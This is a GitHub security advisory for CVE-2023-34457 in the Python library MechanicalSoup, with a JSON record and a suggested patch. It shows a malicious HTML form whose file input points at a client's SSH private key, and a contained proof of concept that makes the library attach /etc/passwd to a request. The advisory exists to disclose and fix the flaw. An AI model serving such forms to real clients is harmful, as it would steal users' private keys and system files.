ghsa-x456-3ccm-m6j4
Vulnerability from github
Published
2023-07-05 21:35
Modified
2024-10-01 19:29
Summary
MechanicalSoup vulnerable to malicious web server reading arbitrary files on client using file input inside HTML form
Details

Summary

A malicious web server can read arbitrary files on the client using a <input type="file" ...> inside HTML form.

Details

This affects the extremely common pattern of form submission:

python b = mechanicalsoup.StatefulBrowser() b.select_form(...) b.submit_selected()

The problem is with the code in browser.Browser.get_request_kwargs:

python if tag.get("type", "").lower() == "file" and multipart: filepath = value if filepath != "" and isinstance(filepath, str): content = open(filepath, "rb") else: content = "" filename = os.path.basename(filepath) # If value is the empty string, we still pass it # for consistency with browsers (see # https://github.com/MechanicalSoup/MechanicalSoup/issues/250). files[name] = (filename, content)

The file path is taken from the bs4 tag "value" attribute. However, this path will default to whatever the server sends. So if a malicious web server were to send something like:

```html

```

then upon .submit_selected() the mechanicalsoup browser will happily send over the contents of your SSH private key.

PoC

```python import attr import mechanicalsoup import requests

class NevermindError(Exception): pass

@attr.s class FakeSession: session = attr.ib()

headers = property(lambda self: self.session.headers)

def request(self, *args, **kwargs):
    print("requested", args, kwargs)
    raise NevermindError  # don't actually send request

def demonstrate(inputs=None): b = mechanicalsoup.StatefulBrowser(FakeSession(requests.Session())) b.open_fake_page("""\

""", url="http://127.0.0.1:9/") b.select_form() if inputs is not None: b.form.set_input(inputs) try: b.submit_selected() except NevermindError: pass

%%

unpatched

demonstrate()

OUTPUT: requested () {'method': 'post', 'url': 'http://127.0.0.1:9/', 'files': {'evil': ('passwd', <_io.BufferedReader name='/etc/passwd'>), 'second': ('', '')}, 'headers': {'Referer': 'http://127.0.0.1:9/'}, 'data': [('greeting', 'hello')]}

%%

with the patch, this now works. users MUST open the file manually and

use browser.set_input() using the file object.

demonstrate({"greeting": "hiya", "evil": open("/etc/hostname", "rb").name, "second": open("/dev/null", "rb")})

OUTPUT: requested () {'method': 'post', 'url': 'http://127.0.0.1:9/', 'files': {'evil': ('hostname', <_io.BufferedReader name='/etc/hostname'>), 'second': ('null', <_io.BufferedReader name='/dev/null'>)}, 'headers': {'Referer': 'http://127.0.0.1:9/'}, 'data': [('greeting', 'hiya')]}

%%

with the patch, this raises a ValueError with a helpful string

demonstrate({"evil": "/etc/hostname"})

%%

with the patch, we silently send no file if a malicious server tries the attack:

demonstrate() ```

Suggested patch

```diff diff --git a/mechanicalsoup/browser.py b/mechanicalsoup/browser.py index 285f8bb..68bc65e 100644 --- a/mechanicalsoup/browser.py +++ b/mechanicalsoup/browser.py @@ -1,7 +1,8 @@ +import io import os import tempfile import urllib import weakref import webbrowser

import bs4 @@ -227,15 +228,21 @@ class Browser: value = tag.get("value", "")

             # If the enctype is not multipart, the filename is put in
             # the form as a text input and the file is not sent.
             if tag.get("type", "").lower() == "file" and multipart:
                 filepath = value
                 if filepath != "" and isinstance(filepath, str):
  • content = open(filepath, "rb")
  • content = getattr(tag, "_mechanicalsoup_file", None)
  • if content is False:
  • raise ValueError(
  • """From v1.3.0 onwards, you must pass an open file object directly, for example using form.set_input({"name": open("/path/to/filename", "rb")}). This change is to mitigate a security vulnerability where a malicious web server could read arbitrary files from the client."""
  • )
  • elif not isinstance(content, io.IOBase):
  • content = "" else: content = "" filename = os.path.basename(filepath) # If value is the empty string, we still pass it # for consistency with browsers (see # https://github.com/MechanicalSoup/MechanicalSoup/issues/250). files[name] = (filename, content) diff --git a/mechanicalsoup/form.py b/mechanicalsoup/form.py index a67195c..82f6015 100644 --- a/mechanicalsoup/form.py +++ b/mechanicalsoup/form.py @@ -1,8 +1,9 @@ import copy +import io import warnings

from bs4 import BeautifulSoup

from .utils import LinkNotFoundError

@@ -64,15 +65,24 @@ class Form: give it the value password. """

     for (name, value) in data.items():
         i = self.form.find("input", {"name": name})
         if not i:
             raise InvalidFormMethod("No input field named " + name)
  • i["value"] = value +
  • if isinstance(value, io.IOBase):
  • Store the actual file object for

  • i._mechanicalsoup_file = value
  • i["value"] = value.name
  • else:
  • We set _mechanicalsoup_file to False so that we can

  • check for deprecated use of the API.

  • i._mechanicalsoup_file = False
  • i["value"] = value

    def uncheck_all(self, name): """Remove the checked-attribute of all input elements with a name-attribute given by name. """ for option in self.form.find_all("input", {"name": name}): if "checked" in option.attrs: @@ -257,20 +267,20 @@ class Form: .. code-block:: python

         form.set("login", username)
         form.set("password", password)
         form.set("eula-checkbox", True)
    
     Example: uploading a file through a ``<input type="file"
    
    • name="tagname">`` field (provide the path to the local file,
    • name="tagname">`` field (provide an open file object, and its content will be uploaded):

      .. code-block:: python

  • form.set("tagname", path_to_local_file)

  • form.set("tagname", open(path_to_local_file, "rb"))
     """
     for func in ("checkbox", "radio", "input", "textarea", "select"):
         try:
             getattr(self, "set_" + func)({name: value})
             return
         except InvalidFormMethod:
    

    ```

Impact

All users of MechanicalSoup's form submission are affected, unless they took very specific (and manual) steps to reset HTML form field values.

Show details on source website


{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "MechanicalSoup"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.2.0"
            },
            {
              "fixed": "1.3.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-34457"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-07-05T21:35:54Z",
    "nvd_published_at": "2023-07-05T20:15:10Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nA malicious web server can read arbitrary files on the client using a `\u003cinput type=\"file\" ...\u003e` inside HTML form.\n\n### Details\nThis affects the extremely common pattern of form submission:\n\n```python\nb = mechanicalsoup.StatefulBrowser()\nb.select_form(...)\nb.submit_selected()\n```\n\nThe problem is with the code in `browser.Browser.get_request_kwargs`:\n\n```python\n    if tag.get(\"type\", \"\").lower() == \"file\" and multipart:\n        filepath = value\n        if filepath != \"\" and isinstance(filepath, str):\n            content = open(filepath, \"rb\")\n        else:\n            content = \"\"\n        filename = os.path.basename(filepath)\n        # If value is the empty string, we still pass it\n        # for consistency with browsers (see\n        # https://github.com/MechanicalSoup/MechanicalSoup/issues/250).\n        files[name] = (filename, content)\n```\n\nThe file path is taken from the bs4 tag \"value\" attribute. However, this path will default to whatever the server sends. So if a malicious web server were to send something like:\n\n```html\n\u003chtml\u003e\u003cbody\u003e\n  \u003cform method=\"post\" enctype=\"multipart/form-data\"\u003e\n    \u003cinput type=\"text\" name=\"greeting\" value=\"hello\" /\u003e\n    \u003cinput type=\"file\" name=\"evil\" value=\"/home/user/.ssh/id_rsa\" /\u003e\n  \u003c/form\u003e\n\u003c/body\u003e\u003c/html\u003e\n```\n\nthen upon `.submit_selected()` the mechanicalsoup browser will happily send over the contents of your SSH private key.\n\n### PoC\n\n```python\nimport attr\nimport mechanicalsoup\nimport requests\n\n\nclass NevermindError(Exception):\n    pass\n\n\n@attr.s\nclass FakeSession:\n    session = attr.ib()\n\n    headers = property(lambda self: self.session.headers)\n\n    def request(self, *args, **kwargs):\n        print(\"requested\", args, kwargs)\n        raise NevermindError  # don\u0027t actually send request\n\n\ndef demonstrate(inputs=None):\n    b = mechanicalsoup.StatefulBrowser(FakeSession(requests.Session()))\n    b.open_fake_page(\"\"\"\\\n\u003chtml\u003e\u003cbody\u003e\n\u003cform method=\"post\" enctype=\"multipart/form-data\"\u003e\n\u003cinput type=\"text\" name=\"greeting\" value=\"hello\" /\u003e\n\u003cinput type=\"file\" name=\"evil\" value=\"/etc/passwd\" /\u003e\n\u003cinput type=\"file\" name=\"second\" /\u003e\n\u003c/form\u003e\n\u003c/body\u003e\u003c/html\u003e\n\"\"\", url=\"http://127.0.0.1:9/\")\n    b.select_form()\n    if inputs is not None:\n        b.form.set_input(inputs)\n    try:\n        b.submit_selected()\n    except NevermindError:\n        pass\n\n# %%\n\n# unpatched\ndemonstrate()\n# OUTPUT: requested () {\u0027method\u0027: \u0027post\u0027, \u0027url\u0027: \u0027http://127.0.0.1:9/\u0027, \u0027files\u0027: {\u0027evil\u0027: (\u0027passwd\u0027, \u003c_io.BufferedReader name=\u0027/etc/passwd\u0027\u003e), \u0027second\u0027: (\u0027\u0027, \u0027\u0027)}, \u0027headers\u0027: {\u0027Referer\u0027: \u0027http://127.0.0.1:9/\u0027}, \u0027data\u0027: [(\u0027greeting\u0027, \u0027hello\u0027)]}\n\n# %%\n\n# with the patch, this now works. users MUST open the file manually and\n# use browser.set_input() using the file object.\ndemonstrate({\"greeting\": \"hiya\", \"evil\": open(\"/etc/hostname\", \"rb\").name, \"second\": open(\"/dev/null\", \"rb\")})\n# OUTPUT: requested () {\u0027method\u0027: \u0027post\u0027, \u0027url\u0027: \u0027http://127.0.0.1:9/\u0027, \u0027files\u0027: {\u0027evil\u0027: (\u0027hostname\u0027, \u003c_io.BufferedReader name=\u0027/etc/hostname\u0027\u003e), \u0027second\u0027: (\u0027null\u0027, \u003c_io.BufferedReader name=\u0027/dev/null\u0027\u003e)}, \u0027headers\u0027: {\u0027Referer\u0027: \u0027http://127.0.0.1:9/\u0027}, \u0027data\u0027: [(\u0027greeting\u0027, \u0027hiya\u0027)]}\n\n# %%\n\n# with the patch, this raises a ValueError with a helpful string\ndemonstrate({\"evil\": \"/etc/hostname\"})\n\n# %%\n\n# with the patch, we silently send no file if a malicious server tries the attack:\ndemonstrate()\n```\n\n### Suggested patch\n\n```diff\ndiff --git a/mechanicalsoup/browser.py b/mechanicalsoup/browser.py\nindex 285f8bb..68bc65e 100644\n--- a/mechanicalsoup/browser.py\n+++ b/mechanicalsoup/browser.py\n@@ -1,7 +1,8 @@\n+import io\n import os\n import tempfile\n import urllib\n import weakref\n import webbrowser\n \n import bs4\n@@ -227,15 +228,21 @@ class Browser:\n                     value = tag.get(\"value\", \"\")\n \n                 # If the enctype is not multipart, the filename is put in\n                 # the form as a text input and the file is not sent.\n                 if tag.get(\"type\", \"\").lower() == \"file\" and multipart:\n                     filepath = value\n                     if filepath != \"\" and isinstance(filepath, str):\n-                        content = open(filepath, \"rb\")\n+                        content = getattr(tag, \"_mechanicalsoup_file\", None)\n+                        if content is False:\n+                            raise ValueError(\n+                                \"\"\"From v1.3.0 onwards, you must pass an open file object directly, for example using `form.set_input({\"name\": open(\"/path/to/filename\", \"rb\")})`. This change is to mitigate a security vulnerability where a malicious web server could read arbitrary files from the client.\"\"\"\n+                            )\n+                        elif not isinstance(content, io.IOBase):\n+                            content = \"\"\n                     else:\n                         content = \"\"\n                     filename = os.path.basename(filepath)\n                     # If value is the empty string, we still pass it\n                     # for consistency with browsers (see\n                     # https://github.com/MechanicalSoup/MechanicalSoup/issues/250).\n                     files[name] = (filename, content)\ndiff --git a/mechanicalsoup/form.py b/mechanicalsoup/form.py\nindex a67195c..82f6015 100644\n--- a/mechanicalsoup/form.py\n+++ b/mechanicalsoup/form.py\n@@ -1,8 +1,9 @@\n import copy\n+import io\n import warnings\n \n from bs4 import BeautifulSoup\n \n from .utils import LinkNotFoundError\n \n \n@@ -64,15 +65,24 @@ class Form:\n         give it the value ``password``.\n         \"\"\"\n \n         for (name, value) in data.items():\n             i = self.form.find(\"input\", {\"name\": name})\n             if not i:\n                 raise InvalidFormMethod(\"No input field named \" + name)\n-            i[\"value\"] = value\n+\n+            if isinstance(value, io.IOBase):\n+                # Store the actual file object for \u003cinput type=\"file\"\u003e\n+                i._mechanicalsoup_file = value\n+                i[\"value\"] = value.name\n+            else:\n+                # We set `_mechanicalsoup_file` to `False` so that we can\n+                # check for deprecated use of the API.\n+                i._mechanicalsoup_file = False\n+                i[\"value\"] = value\n \n     def uncheck_all(self, name):\n         \"\"\"Remove the *checked*-attribute of all input elements with\n         a *name*-attribute given by ``name``.\n         \"\"\"\n         for option in self.form.find_all(\"input\", {\"name\": name}):\n             if \"checked\" in option.attrs:\n@@ -257,20 +267,20 @@ class Form:\n         .. code-block:: python\n \n             form.set(\"login\", username)\n             form.set(\"password\", password)\n             form.set(\"eula-checkbox\", True)\n \n         Example: uploading a file through a ``\u003cinput type=\"file\"\n-        name=\"tagname\"\u003e`` field (provide the path to the local file,\n+        name=\"tagname\"\u003e`` field (provide an open file object,\n         and its content will be uploaded):\n \n         .. code-block:: python\n \n-            form.set(\"tagname\", path_to_local_file)\n+            form.set(\"tagname\", open(path_to_local_file, \"rb\"))\n \n         \"\"\"\n         for func in (\"checkbox\", \"radio\", \"input\", \"textarea\", \"select\"):\n             try:\n                 getattr(self, \"set_\" + func)({name: value})\n                 return\n             except InvalidFormMethod:\n```\n\n### Impact\n\nAll users of MechanicalSoup\u0027s form submission are affected, unless they took very specific (and manual) steps to reset HTML form field values.",
  "id": "GHSA-x456-3ccm-m6j4",
  "modified": "2024-10-01T19:29:06Z",
  "published": "2023-07-05T21:35:54Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/MechanicalSoup/MechanicalSoup/security/advisories/GHSA-x456-3ccm-m6j4"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34457"
    },
    {
      "type": "WEB",
      "url": "https://github.com/MechanicalSoup/MechanicalSoup/commit/d57c4a269bba3b9a0c5bfa20292955b849006d9e"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/MechanicalSoup/MechanicalSoup"
    },
    {
      "type": "WEB",
      "url": "https://github.com/MechanicalSoup/MechanicalSoup/releases/tag/v1.3.0"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/mechanicalsoup/PYSEC-2023-108.yaml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "MechanicalSoup vulnerable to malicious web server reading arbitrary files on client using file input inside HTML form"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.


Loading…

Loading…